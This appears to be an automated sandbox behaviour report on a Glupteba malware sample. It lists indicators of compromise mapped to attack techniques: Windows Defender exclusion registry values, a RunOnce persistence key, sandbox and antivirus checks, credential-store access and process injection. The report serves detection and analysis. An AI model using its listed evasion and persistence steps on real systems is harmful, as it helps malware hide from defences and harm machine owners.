glupteba | b2718252be051e7fbc18b319b31ef746d88407272473a465b673cea0de3c4aad

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Sefejilusi.exe

Loads dropped DLL 64 IoCs

pid	Process
3732	Install.tmp
4308	rundll32.exe
4752	SunLabsPlayer.exe
4996	y1.exe
4752	SunLabsPlayer.exe
4996	y1.exe
4996	y1.exe
4996	y1.exe
4996	y1.exe
5356	toolspab1.exe
5988	c7ae36fa.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
2212	2DB3.exe
2212	2DB3.exe
2212	2DB3.exe
2212	2DB3.exe
2212	2DB3.exe
2212	2DB3.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
5088	rundll32.exe
4144	rundll32.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4752	SunLabsPlayer.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe
4356	lighteningplayer-cache-gen.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlRhNcvOzN = "0"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Hizhitaelerae.exe\""	Ultra.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md1_1eaf.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
147	ip-api.com
185	api.myip.com
186	api.myip.com

Drops file in System32 directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\DlRhNcvOzN	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\67TB692L.cookie	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 3850846835BDE190	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\67TB692L.cookie	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 4C63796807C1C88A	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1032 set thread context of 4492	1032	svchost.exe	98
PID 5628 set thread context of 5356	5628	toolspab1.exe	132
PID 5932 set thread context of 5828	5932	bfcggfb	203
PID 4720 set thread context of 1716	4720	bfcggfb	208
PID 960 set thread context of 5376	960	bfcggfb	216

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\Windows Security\UGIGLWABTJ\ultramediaburner.exe	Ultra.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-CHF34.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\cache.dat	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\2	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac	SunLabsPlayer.exe
File created	C:\Program Files\libEGL.dll	google-game.exe
File created	C:\Program Files (x86)\lighteningplayer\data_load.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\regstr	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\bckf.fon	data_load.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File opened for modification	C:\Program Files\temp_files\	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\DlRhNcvOzN\cache.dat	rundll32.exe
File opened for modification	C:\Program Files (x86)\DlRhNcvOzN\cache.dat	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\uninstall.exe	SunLabsPlayer.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral26/files/0x000100000001ac22-253.dat	nsis_installer_2
behavioral26/files/0x000100000001ac22-252.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfcggfb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	edcggfb

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5124	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
5804	bitsadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5380	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A2524059-0239-4AF7-97F4-75763B263040}User	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	app.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	app.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A2524059-0239-4AF7-97F4-75763B263040}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	app.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A2524059-0239-4AF7-97F4-75763B263040}Machine	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A2524059-0239-4AF7-97F4-75763B263040}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A2524059-0239-4AF7-97F4-75763B263040}Machine\SOFTWARE	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	app.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\NumberOfSub = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
